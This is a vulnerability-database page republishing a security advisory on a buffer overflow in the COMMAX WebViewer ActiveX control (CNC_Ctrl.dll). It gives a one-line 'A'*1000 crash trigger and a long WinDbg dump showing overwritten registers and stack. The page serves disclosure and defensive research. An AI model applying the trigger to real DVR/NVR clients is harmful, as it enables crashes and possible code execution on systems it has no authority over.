Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

COMMAX WebViewer ActiveX Control 2.1.4.5 Buffer Overflow

🗓️ 16 Aug 2021 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 295 Views

COMMAX WebViewer ActiveX Control 2.1.4.5 Buffer Overflow in 32-bit client for COMMAX DVR/NV

Code
`  
COMMAX WebViewer ActiveX Control 2.1.4.5 (Commax_WebViewer.ocx) Buffer Overflow  
  
  
Vendor: COMMAX Co., Ltd.  
Prodcut web page: https://www.commax.com  
Affected version: 2.1.4.5  
  
Summary: COMMAX activex web viewer client (32bit) for COMMAX DVR/NVR.  
  
Desc: The vulnerability is caused due to a boundary error in the  
processing of user input, which can be exploited to cause a buffer  
overflow when a user inserts overly long array of string bytes  
through several functions. Successful exploitation could allow  
execution of arbitrary code on the affected node.  
  
Tested on: Microsoft Windows 10 Home (64bit) EN  
Microsoft Internet Explorer 20H2  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2021-5663  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5663.php  
  
  
02.08.2021  
  
--  
  
  
$ python  
>>> "A"*1000 [ToTheClipboard]  
>>>#Paste in ID or anywhere  
  
(5220.5b30): Access violation - code c0000005 (!!! second chance !!!)  
wow64!Wow64pNotifyDebugger+0x19918:  
00007ff9`deb0b530 c644242001 mov byte ptr [rsp+20h],1 ss:00000000`0c47de00=00  
0:038> g  
(5220.5b30): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for CNC_Ctrl.DLL -   
CNC_Ctrl!DllUnregisterServer+0xf5501:  
0b4d43bf f3aa rep stos byte ptr es:[edi]  
0:038:x86> r  
eax=00000000 ebx=00002000 ecx=0000000f edx=00000000 esi=41414141 edi=41414141  
eip=0b4d43bf esp=0d78f920 ebp=0d78f930 iopl=0 nv up ei pl zr na pe nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246  
CNC_Ctrl!DllUnregisterServer+0xf5501:  
0b4d43bf f3aa rep stos byte ptr es:[edi]  
0:038:x86> !exchain  
0d78fac4: CNC_Ctrl!DllUnregisterServer+eca92 (0b4cb950)  
0d78fb74: ntdll_76f80000!_except_handler4+0 (76ffad20)  
CRT scope 0, filter: ntdll_76f80000!__RtlUserThreadStart+3cdb7 (77024806)  
func: ntdll_76f80000!__RtlUserThreadStart+3ce50 (7702489f)  
0d78fb8c: ntdll_76f80000!FinalExceptionHandlerPad25+0 (77008a29)  
Invalid exception stack at ffffffff  
0:038:x86> kb  
# ChildEBP RetAddr Args to Child   
WARNING: Stack unwind information not available. Following frames may be wrong.  
00 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501  
01 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c  
02 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67  
03 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7  
0:038:x86> d esp  
0d78f920 0f 00 00 00 00 00 00 00-dc 2e ff 76 78 c5 7e 0b ...........vx.~.  
0d78f930 b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00 ..~..]@.AAAA....  
0d78f940 00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00 . ......x.~.....  
0d78f950 10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00 .^.u%[email protected]. ...  
0d78f960 00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00 .i.a..x.........  
0d78f970 10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76 ..........x.W(.v  
0d78f980 70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76 p:...........(.v  
0d78f990 00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00 ............t...  
0:038:x86> d ebp  
0d78f930 b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00 ..~..]@.AAAA....  
0d78f940 00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00 . ......x.~.....  
0d78f950 10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00 .^.u%[email protected]. ...  
0d78f960 00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00 .i.a..x.........  
0d78f970 10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76 ..........x.W(.v  
0d78f980 70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76 p:...........(.v  
0d78f990 00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00 ............t...  
0d78f9a0 8c 0c 00 00 88 0e 00 00-8c 0e 00 00 b8 0d 00 00 ................  
0:038:x86> d esi  
41414141 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
41414151 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
41414161 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
41414171 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
41414181 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
41414191 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
414141a1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
414141b1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
0:038:x86> !analyze -v  
*******************************************************************************  
* *  
* Exception Analysis *  
* *  
*******************************************************************************  
  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ie_to_edge_bho.dll -   
*** ERROR: Symbol file could not be found. Defaulted to export symbols for Commax_WebViewer.OCX -   
GetUrlPageData2 (WinHttp) failed: 12002.  
  
DUMP_CLASS: 2  
  
DUMP_QUALIFIER: 0  
  
FAULTING_IP:   
CNC_Ctrl!DllUnregisterServer+f5501  
0b4d43bf f3aa rep stos byte ptr es:[edi]  
  
EXCEPTION_RECORD: (.exr -1)  
ExceptionAddress: 0b4d43bf (CNC_Ctrl!DllUnregisterServer+0x000f5501)  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000000  
NumberParameters: 2  
Parameter[0]: 00000001  
Parameter[1]: 41414141  
Attempt to write to address 41414141  
  
FAULTING_THREAD: 00005b30  
  
DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE  
  
PROCESS_NAME: IEXPLORE.EXE  
  
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.  
  
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.  
  
EXCEPTION_CODE_STR: c0000005  
  
EXCEPTION_PARAMETER1: 00000001  
  
EXCEPTION_PARAMETER2: 41414141  
  
FOLLOWUP_IP:   
CNC_Ctrl!DllUnregisterServer+f5501  
0b4d43bf f3aa rep stos byte ptr es:[edi]  
  
WRITE_ADDRESS: 41414141   
  
WATSON_BKT_PROCSTAMP: 95286d96  
  
WATSON_BKT_PROCVER: 11.0.19041.1  
  
PROCESS_VER_PRODUCT: Internet Explorer  
  
WATSON_BKT_MODULE: CNC_Ctrl.DLL  
  
WATSON_BKT_MODSTAMP: 547ed821  
  
WATSON_BKT_MODOFFSET: 1043bf  
  
WATSON_BKT_MODVER: 1.7.0.2  
  
MODULE_VER_PRODUCT: CNC_Ctrl Module  
  
BUILD_VERSION_STRING: 10.0.19041.1023 (WinBuild.160101.0800)  
  
MODLIST_WITH_TSCHKSUM_HASH: aadfa1c5bdd8f77b979f6a5b222994db450b715e  
  
MODLIST_SHA1_HASH: 849cfdbdcb18d5749dc41f313fc544a643772db9  
  
NTGLOBALFLAG: 0  
  
PROCESS_BAM_CURRENT_THROTTLED: 0  
  
PROCESS_BAM_PREVIOUS_THROTTLED: 0  
  
APPLICATION_VERIFIER_FLAGS: 0  
  
PRODUCT_TYPE: 1  
  
SUITE_MASK: 784  
  
DUMP_TYPE: fe  
  
ANALYSIS_SESSION_HOST: LAB17  
  
ANALYSIS_SESSION_TIME: 08-12-2021 14:20:11.0116  
  
ANALYSIS_VERSION: 10.0.16299.91 amd64fre  
  
THREAD_ATTRIBUTES:   
OS_LOCALE: ENU  
  
PROBLEM_CLASSES:   
  
ID: [0n301]  
Type: [@ACCESS_VIOLATION]  
Class: Addendum  
Scope: BUCKET_ID  
Name: Omit  
Data: Omit  
PID: [Unspecified]  
TID: [0x5b30]  
Frame: [0] : CNC_Ctrl!DllUnregisterServer  
  
ID: [0n274]  
Type: [INVALID_POINTER_WRITE]  
Class: Primary  
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)  
BUCKET_ID  
Name: Add  
Data: Omit  
PID: [Unspecified]  
TID: [0x5b30]  
Frame: [0] : CNC_Ctrl!DllUnregisterServer  
  
ID: [0n152]  
Type: [ZEROED_STACK]  
Class: Addendum  
Scope: BUCKET_ID  
Name: Add  
Data: Omit  
PID: [0x5220]  
TID: [0x5b30]  
Frame: [0] : CNC_Ctrl!DllUnregisterServer  
  
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK  
  
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT  
  
LAST_CONTROL_TRANSFER: from 0b405dea to 0b4d43bf  
  
STACK_TEXT:   
WARNING: Stack unwind information not available. Following frames may be wrong.  
0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501  
0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c  
0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67  
0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7  
  
  
THREAD_SHA1_HASH_MOD_FUNC: e84e62df4095d241971250198ae18de0797cfdc7  
  
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 2033316a7c1a92aaeab1ce97e013350953fef546  
  
THREAD_SHA1_HASH_MOD: 6d850af928076b326edbcafdf6dd4f771aafbab5  
  
FAULT_INSTR_CODE: 458baaf3  
  
SYMBOL_STACK_INDEX: 0  
  
SYMBOL_NAME: CNC_Ctrl!DllUnregisterServer+f5501  
  
FOLLOWUP_NAME: MachineOwner  
  
MODULE_NAME: CNC_Ctrl  
  
IMAGE_NAME: CNC_Ctrl.DLL  
  
DEBUG_FLR_IMAGE_TIMESTAMP: 547ed821  
  
STACK_COMMAND: ~38s ; .cxr ; kb  
  
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer  
  
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+f5501  
  
FAILURE_EXCEPTION_CODE: c0000005  
  
FAILURE_IMAGE_NAME: CNC_Ctrl.DLL  
  
BUCKET_ID_IMAGE_STR: CNC_Ctrl.DLL  
  
FAILURE_MODULE_NAME: CNC_Ctrl  
  
BUCKET_ID_MODULE_STR: CNC_Ctrl  
  
FAILURE_FUNCTION_NAME: DllUnregisterServer  
  
BUCKET_ID_FUNCTION_STR: DllUnregisterServer  
  
BUCKET_ID_OFFSET: f5501  
  
BUCKET_ID_MODTIMEDATESTAMP: 547ed821  
  
BUCKET_ID_MODCHECKSUM: 357a4b  
  
BUCKET_ID_MODVER_STR: 1.7.0.2  
  
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_  
  
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT  
  
FAILURE_SYMBOL_NAME: CNC_Ctrl.DLL!DllUnregisterServer  
  
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/IEXPLORE.EXE/11.0.19041.1/95286d96/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/001043bf.htm?Retriage=1  
  
TARGET_TIME: 2021-08-12T12:21:50.000Z  
  
OSBUILD: 19042  
  
OSSERVICEPACK: 1023  
  
SERVICEPACK_NUMBER: 0  
  
OS_REVISION: 0  
  
OSPLATFORM_TYPE: x64  
  
OSNAME: Windows 10  
  
OSEDITION: Windows 10 WinNt SingleUserTS Personal  
  
USER_LCID: 0  
  
OSBUILD_TIMESTAMP: unknown_date  
  
BUILDDATESTAMP_STR: 160101.0800  
  
BUILDLAB_STR: WinBuild  
  
BUILDOSVER_STR: 10.0.19041.1023  
  
ANALYSIS_SESSION_ELAPSED_TIME: 1d869  
  
ANALYSIS_SOURCE: UM  
  
FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver  
  
FAILURE_ID_HASH: {5e1e375a-c411-e928-cd64-b7f6c07eea3b}  
  
Followup: MachineOwner  
---------  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Aug 2021 00:00Current
0.8Low risk
Vulners AI Score0.8
commaxwebvieweractivexbuffer overflow32bitdvrnvrmicrosoft windows 10 homeinternet explorer 20h2vulnerabilityzsl-2021-5663buffer overflowarbitrary code executiongjoko krsticzeroscienceadvisoryzsl-2021-5663cnc_ctrl dll
295